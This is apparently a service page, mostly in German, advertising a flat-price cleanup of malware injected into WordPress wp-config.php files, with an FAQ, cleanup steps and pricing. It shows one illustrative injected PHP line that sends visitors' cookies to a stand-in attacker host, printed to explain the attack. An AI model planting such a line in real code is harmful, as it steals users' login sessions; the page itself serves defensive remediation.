Wie wurde wp-config.php verändert?

Entweder über eine Plugin-Schwachstelle, die Schreibzugriffe erlaubte, oder über gestohlene SFTP/SSH-Zugangsdaten. Der Bericht nennt den Weg.

Muss ich euch Live-Kundendaten geben?

Ja. Das gehört zu jeder wp-config-Bereinigung. Jede vor der Rotation erstellte Session wird automatisch ungültig.

Kann der Angreifer nach der Bereinigung noch meine Daten lesen?

Nicht, wenn die Injektion nur wp-config betraf — wir entfernen den Code, rotieren Schlüssel und prüfen die Datenbank auf zugehörige Persistenz. Hat der Angreifer währenddessen einen Datenbank-Dump gezogen, sind diese Daten weg; das steht so im Bericht.

Sollte ich stattdessen aus einem Backup wiederherstellen?

Sometimes. If you have a clean pre-incident backup, restoring is fast. I can still do the forensic review and identify the entry vector so the same thing doesn’t happen to the restored site.

// PHARMA-HACK · WORDPRESS · BEREINIGT

wp-config.php malware cleanup.

wp-config.php läuft bei jedem WordPress-Seitenaufruf — deshalb lieben Angreifer sie. Wir entfernen die Injektion, rotieren die Schlüssel und sagen Ihnen, worauf der Angreifer Zugriff hatte. Pauschal 279 $.

Bereinigung starten → Wie wp-config.php manipuliert wird

§ 01 — MECHANISMUS

wp-config.php ist der schlechteste Ort für Angreifer-Code.

wp-config.php wird bei jeder WordPress-Anfrage geladen, bevor WordPress selbst filtern kann. Wer diese Datei verändert, kann auf jeder Seite Code ausführen, jede Anmeldung mitschneiden oder versteckte Admins anlegen, die im Dashboard nicht erscheinen.

Sobald wp-config.php angefasst wurde, gelten Ihre Salts, das Datenbank-Passwort und die Authentifizierungsschlüssel als kompromittiert. Wir rotieren alles im Rahmen der Bereinigung — kein Upselling.

// wp-config.php — typisches Injektionsmuster

01 02 // Legitimate wp-config starts with constants.
03 define('DB_NAME', 'wp_database');
04
05 // Injected — sends auth cookies to attacker on every request:
06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);

§ 02 — WAS WIR ENTFERNEN

Jede Zeile, jeder Schlüssel, jedes Konto.

[ PLUGIN-TRIAGE ]

wp-config.php Zeile für Zeile mit einem sauberen Basiszustand verglichen. Jede nicht standardmäßige Zeile wird geprüft.
[ WP-CONFIG ]

Eingeschleuster Code entfernt. Verirrte include/require-Zeilen, die auf unbekannte Dateien zeigen — geprüft und entfernt.
[ SCHLÜSSEL ]

AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY und ihre Salts rotiert. Alle Sessions ungültig gemacht.
[ DATENBANK ]

Versteckte Admin-Nutzer entfernt. Autoloaded wp_options-Payloads auf zugehörige Persistenz geprüft.
[ ABSICHERUNG ]

Berechtigungen für wp-config.php verschärft. .htaccess- und Nginx-Regeln ergänzt, um direkten Zugriff zu verweigern.
[ BERICHT ]

Forensischer Bericht in verständlicher Sprache: worauf der Angreifer Zugriff hatte, was rotiert wurde, was Sie noch tun müssen.

§ PREISE

Pauschal $279. Einmalig. Pro Seite.

[ RESCUE ]

$279

PAUSCHAL · EINMALIG · PRO SEITE

Manual cleanup, entry-vector identification, written forensic report.

Bereinigung starten →

[ SHIELD ]

$29 / mo

PRO SEITE · JEDERZEIT KÜNDBAR

Laufendes Monitoring, Absicherung, eine Bereinigung pro Jahr inklusive.

Schützen lassen →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Alle Leistungen ansehen →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Kontakt →